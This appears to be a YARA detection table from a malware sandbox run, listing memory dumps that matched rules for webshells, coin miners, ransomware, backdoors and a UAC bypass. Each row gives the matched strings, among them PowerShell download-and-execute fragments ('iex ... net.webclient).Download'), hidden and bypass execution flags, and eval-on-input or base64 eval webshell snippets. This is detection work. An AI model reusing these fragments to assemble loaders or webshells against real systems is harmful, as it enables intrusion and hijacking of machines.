00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x6359:$asp_much_sus8: Webshell 0x7fbd:$asp_much_sus8: Webshell 0x4831:$asp_much_sus39: u"+"n"+"s 0x4b7b:$asp_gen_sus10: "cmd" 0x5730:$asp_gen_sus12: %comspec% 0x40f2:$asp_gen_obf1: "+" 0x458e:$asp_gen_obf1: "+" 0x45d9:$asp_gen_obf1: "+" 0x45e4:$asp_gen_obf1: "+" 0x45ef:$asp_gen_obf1: "+" 0x4624:$asp_gen_obf1: "+" 0x462f:$asp_gen_obf1: "+" 0x463a:$asp_gen_obf1: "+" 0x466f:$asp_gen_obf1: "+" 0x467a:$asp_gen_obf1: "+" 0x4685:$asp_gen_obf1: "+" 0x46ba:$asp_gen_obf1: "+" 0x46c5:$asp_gen_obf1: "+" 0x46d0:$asp_gen_obf1: "+" 0x4705:$asp_gen_obf1: "+" 0x4710:$asp_gen_obf1: "+"
00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4da1:$opbs73: eval(str_rot13( 0x32f4:$php_short: <? 0x767b:$php_short: <? 0x23557:$php_short: <? 0x23aa7:$php_short: <? 0x2a5b5:$php_short: <? 0x37c06:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1e053:$r2: p^owershell
00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x1b0fb:$x1: iex ((new-object net.webclient).Download
00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1e3a1:$sb1: -w Hidden 0x1e14d:$sb3: -windowstyle hidden 0x1e142:$sc2: -noprofile 0x1e12a:$se3: -ExecutionPolicy bypass
00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x2358f:$a: Cookies: Sym1.0 0x23530:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x13aea:$s1: .CreateObject("WScript.Shell") 0x10115:$p1: powershell.exe 0x10bf3:$p1: powershell.exe 0x13b1b:$p1: powershell.exe
00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0x39769:$x1: S:\Ammyy\sources\target\TrService.cpp 0x39793:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0x397c5:$x3: Global\Ammyy.Target.IncomePort 0x397e8:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0x39814:$x5: Please enter password for accessing remote computer 0x3969f:$s1: CreateProcess1()#3 %d error=%d 0x396c2:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0x39706:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0x3973c:$s4: ERROR: FindProcessByName('explorer.exe')
00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1963d:$s1: stratum+tcp://
00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x39c5c:$x1: /////////////////////regkeyenum////////////
00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xc2d5:$s1: stratum+tcp://
00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x23488:$s1: stratum+tcp:// 0x240a4:$s1: stratum+tcp://
00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3a13c:$s1: stratum+tcp://
00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x23488:$s1: stratum+tcp:// 0x240a4:$s1: stratum+tcp://
00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0xa4ce:$new_php2: <?php 0xaef0:$new_php2: <?php 0xa4d3:$dynamic1: $_system($ 0x33c0:$gen_bit_sus47: Shell 0x36de:$gen_bit_sus47: Shell 0x5725:$gen_bit_sus47: Shell 0x5a18:$gen_bit_sus47: Shell 0x6072:$gen_bit_sus47: Shell 0x9d6d:$gen_bit_sus47: Shell 0x1c73:$gen_bit_sus50: bypass 0x88ad:$gen_bit_sus61: /bin/sh 0x9d1d:$gen_much_sus8: Webshell 0xa259:$gen_much_sus8: webshell 0xab7b:$gen_much_sus8: WebShell 0xaedb:$gen_much_sus8: WebShell 0x3af3a:$gen_much_sus8: WebShell 0x2a00b:$gen_much_sus15: Antivirus 0x2a046:$gen_much_sus15: Antivirus 0x2a36b:$gen_much_sus15: Antivirus 0x2a544:$gen_much_sus15: Antivirus 0x2a607:$gen_much_sus15: AntiVirus
00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	webshell_php_base64_encoded_payloads	php webshell containing base64 encoded payload	Arnim Rupp	0x30f6c:$decode1: base64_decode 0x31733:$decode1: base64_decode 0x3183c:$decode1: base64_decode 0x31889:$decode1: base64_decode 0x318a7:$decode1: base64_decode 0x11168:$four1: zeXN0ZW 0x31f07:$php_short: <? 0x31f07:$php_new2: <?php
00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3172e:$payload7: eval(base64_decode( 0x31884:$payload7: eval(base64_decode( 0x31f07:$php_short: <? 0x31f07:$php_new2: <?php
00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x31f07:$new_php2: <?php 0x30b08:$dynamic1: $_session[md5($ 0x30b72:$dynamic1: $_session[md5($ 0xd840:$gen_bit_sus2: .replace(/y/g 0x1fd52:$gen_bit_sus11: "cmd.exe 0x147e2:$gen_bit_sus29: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 0x30ddb:$gen_bit_sus35: crack 0x316df:$gen_bit_sus46: shell_ 0x31eae:$gen_bit_sus46: shell_ 0xbe2e:$gen_bit_sus47: Shell 0x24497:$gen_bit_sus47: Shell 0x2fc24:$gen_bit_sus47: Shell 0x31571:$gen_bit_sus47: Shell 0xe210:$gen_bit_sus50: bypass 0x222d6:$gen_bit_sus50: bypass 0x31157:$gen_bit_sus50: bypass 0x31fb3:$gen_bit_sus60: "execute" 0x31e64:$gen_bit_sus69: $cmd 0x2fd2f:$gen_much_sus8: Webshell 0x37520:$gen_much_sus15: antivirus 0x24412:$gen_much_sus16: mcafee
00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x3209c:$pbs3: "b374k 0x30a8f:$pbs6: 0de664ecd2be02cdd54234a0d1229b43 0x31f07:$php_short: <? 0x31f07:$php_new2: <?php
00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x11777:$s1: stratum+tcp://
00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x12145:$payload2: eval(gzinflate(base64_decode( 0x1a3f:$php_short: <? 0x110cf:$php_short: <? 0x1db3b:$php_short: <? 0x1e552:$php_short: <? 0x1e566:$php_short: <? 0x3843d:$php_short: <? 0x3848b:$php_short: <? 0x3843d:$php_new2: <?php 0x3848b:$php_new2: <?php
00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x3843d:$new_php2: <?php 0x3848b:$new_php2: <?php 0x38442:$dynamic1: $_system($ 0xfd77:$dynamic5: $__() 0x372ea:$gen_bit_sus11: "cmd.exe 0xa838:$gen_bit_sus12: %comspec% 0x622e:$gen_bit_sus46: shell_ 0x6281:$gen_bit_sus46: shell_ 0x39fec:$gen_bit_sus47: Shell 0x1064a:$gen_bit_sus50: bypass 0x10700:$gen_bit_sus50: bypass 0xf27c:$gen_bit_sus55: e'.'v 0xf280:$gen_bit_sus55: v'.'a 0xf284:$gen_bit_sus55: a'.'l 0xf294:$gen_bit_sus55: z'.'i 0xf299:$gen_bit_sus55: n'.'f 0xf29d:$gen_bit_sus55: f'.'l 0x11d12:$gen_bit_sus56: m"."d 0x11d18:$gen_bit_sus56: e"."x 0x1090b:$gen_bit_sus59: 'cmd' 0x2cbcb:$gen_bit_sus62: Cyber
00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xf27c:$opbs18: e'.'v'.'a'.'l 0x1a3f:$php_short: <? 0x110cf:$php_short: <? 0x1db3b:$php_short: <? 0x1e552:$php_short: <? 0x1e566:$php_short: <? 0x3843d:$php_short: <? 0x3848b:$php_short: <? 0x3843d:$php_new2: <?php 0x3848b:$php_new2: <?php
00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x11662:$s1: stratum+tcp://
00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1ca4c:$s1: stratum+tcp://
00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xc98:$s1: stratum+tcp://
00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x24e9d:$x4: reflective_inject_dll 0x24e9d:$x8: reflective_inject_dll 0x24e9d:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2cbb:$s1: stratum+tcp://
00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x3664:$sb1: -W hidden 0x365f:$sc1: -nop 0x366e:$sd2: -noninteractive 0x3652:$se2: -exec bypass 0x3652:$se4: -exec bypass
00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x4112:$payload7: eval(base64_decode( 0x410d:$php_short: <? 0x5a0a:$php_short: <? 0x6ae9:$php_short: <? 0x5a0a:$php_new1: <?=$ 0x410d:$php_new2: <?php 0x6ae9:$php_new2: <?php
00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x410d:$new_php2: <?php 0x6ae9:$new_php2: <?php 0x805b:$dynamic1: $split[stringlen($ 0x707d:$gen_bit_sus11: "cmd.exe 0x22b24:$gen_bit_sus23: UPLOAD 0x6871:$gen_bit_sus50: bypass 0x40f7:$gen_much_sus8: Webshell 0x5be8:$gen_much_sus8: Webshell 0x7c05:$gen_much_sus8: WebShell 0x7c58:$gen_much_sus8: WebShell 0x685c:$gen_much_sus15: antivirus 0x560a:$gen_much_sus25: Exploit 0x5ecd:$gen_much_sus25: Exploit 0x61b6:$gen_much_sus25: Exploit 0x6d64:$gen_much_sus25: Exploit 0x7199:$gen_much_sus25: Exploit 0x73e0:$gen_much_sus25: Exploit 0x74d7:$gen_much_sus25: Exploit 0x752a:$gen_much_sus25: Exploit 0x757d:$gen_much_sus25: Exploit 0x75d0:$gen_much_sus25: Exploit
00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x6e7a:$opbs73: eval(str_rot13( 0x410d:$php_short: <? 0x5a0a:$php_short: <? 0x6ae9:$php_short: <? 0x5a0a:$php_new1: <?=$ 0x410d:$php_new2: <?php 0x6ae9:$php_new2: <?php
00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xba15:$s1: "c" & "r" & "i" & "p" & "t"
00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1b837:$sa2: -enCodEdCoMMANd 0x1cd49:$sb1: -w hidden 0x1b823:$sb3: -WindOwsTyLe HiddEN 0x1b818:$sc2: -NOPrOFiLe 0x1b800:$se3: -ExECutioNPolicy bYpAsS
00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
00000023.00000003.6323124773.0000028BD67F0000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x232fa:$a1: SharPersist.lib 0x2330e:$a2: SharPersist.exe 0x23322:$b1: ERROR: Invalid hotkey location option given. 0x23353:$b2: ERROR: Invalid hotkey given. 0x23374:$b3: ERROR: Keepass configuration file not found. 0x233a5:$b4: ERROR: Keepass configuration file was not found. 0x233da:$b5: ERROR: That value already exists in: 0x23403:$b6: ERROR: Failed to delete hidden registry key. 0x23434:$pdb1: \SharPersist\ 0x23446:$pdb2: \SharPersist.pdb
00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32be1:$s1: stratum+tcp:// 0x32c21:$s1: stratum+tcp://
00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x3789c:$: odhyrfjcnfkdtslt
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x196ae:$payload7: eval(base64_decode( 0xe7c7:$php_short: <? 0x19699:$php_short: <? 0x1a50d:$php_short: <? 0x19699:$php_new2: <?php 0x1a50d:$php_new2: <?php
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x19764:$s1: stratum+tcp://
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x333a3:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x33bae:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x33bbe:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0xaec6:$php_short: <? 0xaf05:$php_short: <? 0xaf45:$php_short: <? 0xaf88:$php_short: <? 0xafd2:$php_short: <? 0xb2ef:$php_short: <? 0xb3dd:$php_short: <? 0xb4ca:$php_short: <? 0xb523:$php_short: <? 0xb6a1:$php_short: <? 0xaec6:$php_new2: <?php 0xaf05:$php_new2: <?php 0xaf45:$php_new2: <?php 0xaf88:$php_new2: <?php 0xafd2:$php_new2: <?php 0xb2ef:$php_new2: <?php 0xb4ca:$php_new2: <?php 0xb523:$php_new2: <?php 0xb6a1:$php_new2: <?php 0xba5e:$inp4: _POST[ 0xaee9:$cpayload1: eval($
00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0xb8ab:$payload_and_input1: eval(request. 0xae60:$tagasp_short1: <%e 0xae76:$tagasp_short1: <%\x90 0xb443:$tagasp_short1: <%e 0xb57e:$tagasp_short1: <%e 0xb88c:$tagasp_short1: <%@ 0xb8a9:$tagasp_short1: <%e 0xae35:$tagasp_short2: %> 0xae5e:$tagasp_short2: %> 0xae70:$tagasp_short2: %> 0xb592:$tagasp_short2: %> 0xb8a7:$tagasp_short2: %> 0x1a43a:$tagasp_short2: %> 0x24a66:$tagasp_short2: %> 0xae60:$tagasp_long13: <%ev 0xb443:$tagasp_long13: <%ev 0xb57e:$tagasp_long13: <%ev 0xb8a9:$tagasp_long13: <%ev
00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x12da4:$sb3: -Windowstyle hidden 0x2d537:$sb3: -WindowStyle Hidden 0x12d97:$se2: -exec bypass 0x2d54b:$se3: -ExecutionPolicy Bypass 0x12d97:$se4: -exec bypass
00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x125ab:$one6: Shell Environ$("COMSPEC") & " /c 0x12672:$one6: Shell Environ$("COMSPEC") & " /c 0x12bf5:$one6: Shell Environ$("COMSPEC") & " /c 0x12c16:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x12ba8:$two5: NullRefrencedException 0x12bc0:$two6: error has occurred in user32.dll by 0x12ba8:$two7: NullRefrencedException
00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x3355e:$s1: stratum+tcp://
00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x3355e:$s1: stratum+tcp://
00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x3919b:$x1: reflectively inject a dll into a process. 0x39181:$x4: reflective_inject_dll 0x39238:$x4: reflective_inject_dll 0x39181:$x8: reflective_inject_dll 0x39238:$x8: reflective_inject_dll 0x39238:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x29811:$s1: stratum+tcp://
00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x33359:$payload_and_input1: eval(request. 0x2de59:$tagasp_short1: <%\xC4 0x32ab6:$tagasp_short1: <%\x1D 0x33339:$tagasp_short1: <%@ 0x33357:$tagasp_short1: <%e 0x1c67:$tagasp_short2: %> 0x89d7:$tagasp_short2: %> 0x9527:$tagasp_short2: %> 0xa387:$tagasp_short2: %> 0x2a876:$tagasp_short2: %> 0x33357:$tagasp_long13: <%ev
00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xabb6:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xaa93:$rat2: rat.(Core).generateBeacon 0xaab0:$rat3: rat.gJitter 0xaabe:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xab24:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xab8c:$rat8: rat/modules/netsweeper.(Pinger).listen 0xabb6:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xabe4:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xaa6a:$winblows: rat/platforms/win.(winblows).GetStage
00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x17c5e:$payload_and_input1: eval(request. 0x17c5c:$tagasp_short1: <%e 0x17c81:$tagasp_short2: %> 0x17c5c:$tagasp_long13: <%ev 0xa213:$jsp4: public 0xa271:$jsp4: public
00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x17c9b:$asp_much_sus8: WebShell 0x29d8:$asp_much_sus15: AntiVirus 0x30fc:$asp_much_sus15: AntiVirus 0x3f25:$asp_much_sus15: antivirus 0x4002:$asp_much_sus15: antivirus 0x4016:$asp_much_sus15: antivirus 0xd80f:$asp_much_sus15: Antivirus 0x17c77:$asp_much_sus18: "unsafe 0x18620:$asp_much_sus28: exploit 0x1645e:$asp_gen_sus11: "cmd.exe 0x170a5:$asp_gen_sus11: "cmd.exe 0x182f8:$asp_gen_sus12: %comspec% 0x17cc0:$asp_gen_sus25: shell_ 0x17d83:$asp_gen_obf1: "+" 0x18198:$asp_gen_obf1: "+" 0x1819d:$asp_gen_obf1: "+" 0x181a3:$asp_gen_obf1: "+" 0x181aa:$asp_gen_obf1: "+" 0x181af:$asp_gen_obf1: "+" 0x181b4:$asp_gen_obf1: "+" 0x17c5c:$tagasp_short1: <%e
00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1629f:$s1: stratum+tcp://
00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3a9b9:$payload4: eval(gzuncompress(base64_decode 0x14033:$php_short: <? 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
